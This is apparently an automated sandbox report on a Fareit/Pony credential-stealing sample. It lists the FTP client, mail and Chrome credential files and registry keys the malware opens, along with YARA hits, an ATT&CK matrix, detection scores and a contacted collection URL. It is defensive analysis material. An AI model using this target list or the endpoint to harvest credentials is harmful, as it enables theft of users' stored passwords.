Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\TurboFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\Frigate3\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\AceBIT\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\TurboFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FTP Explorer\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\AceBIT\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword	1_2_0040EC16
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword	1_2_0040EC16
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword	1_1_0040EC16
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword	12_2_0040EC16
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword	12_2_0040EC16
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword	12_1_0040EC16

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Fareit stealer

Show sources

Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Scripting11	Startup Items1	Startup Items1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Scripting11	Input Capture1	File and Directory Discovery3	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder2	Access Token Manipulation11	Obfuscated Files or Information3	Credentials in Registry2	System Information Discovery34	SMB/Windows Admin Shares	Input Capture1	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection21	Install Root Certificate1	NTDS	Query Registry1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder2	Software Packing23	LSA Secrets	Security Software Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Process Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts1	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation11	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection21	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	74%	Virustotal		Browse
2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	71%	Metadefender		Browse
2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	89%	ReversingLabs	Win32.Infostealer.PonyStealer
2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	100%	Avira	HEUR/AGEN.1112794
2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Adnexal8.exe	100%	Avira	HEUR/AGEN.1112794
C:\Users\user\AppData\Roaming\Adnexal8.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adnexal8.exe	73%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Adnexal8.exe	90%	ReversingLabs	Win32.Infostealer.PonyStealer

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.Adnexal8.exe.4d141c2.1.unpack	100%	Avira	TR/Kryptik.avp.8	Download File
12.2.Adnexal8.exe.400000.0.unpack	100%	Avira	TR/Kryptik.avp.8	Download File
0.0.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack	100%	Avira	TR/Kryptik.avp.8	Download File
0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
12.0.Adnexal8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
10.0.Adnexal8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	100%	Avira	TR/Kryptik.avp.8	Download File
10.2.Adnexal8.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	100%	Avira	TR/Kryptik.avp.8	Download File
1.0.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1112794	Download File
12.1.Adnexal8.exe.400000.0.unpack	100%	Avira	TR/Kryptik.avp.8	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://https://ftp://operawand.dat_Software	0%	Avira URL Cloud	safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	0%	Avira URL Cloud	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.phpYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI	0%	Avira URL Cloud	safe
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	low
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/ac/?q=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.ibsensoftware.com/	Adnexal8.exe, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/?gws_rd=ssl	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	false		high
http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.phpYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/W9	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehp	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	false		high
https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=168R	2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	false		high
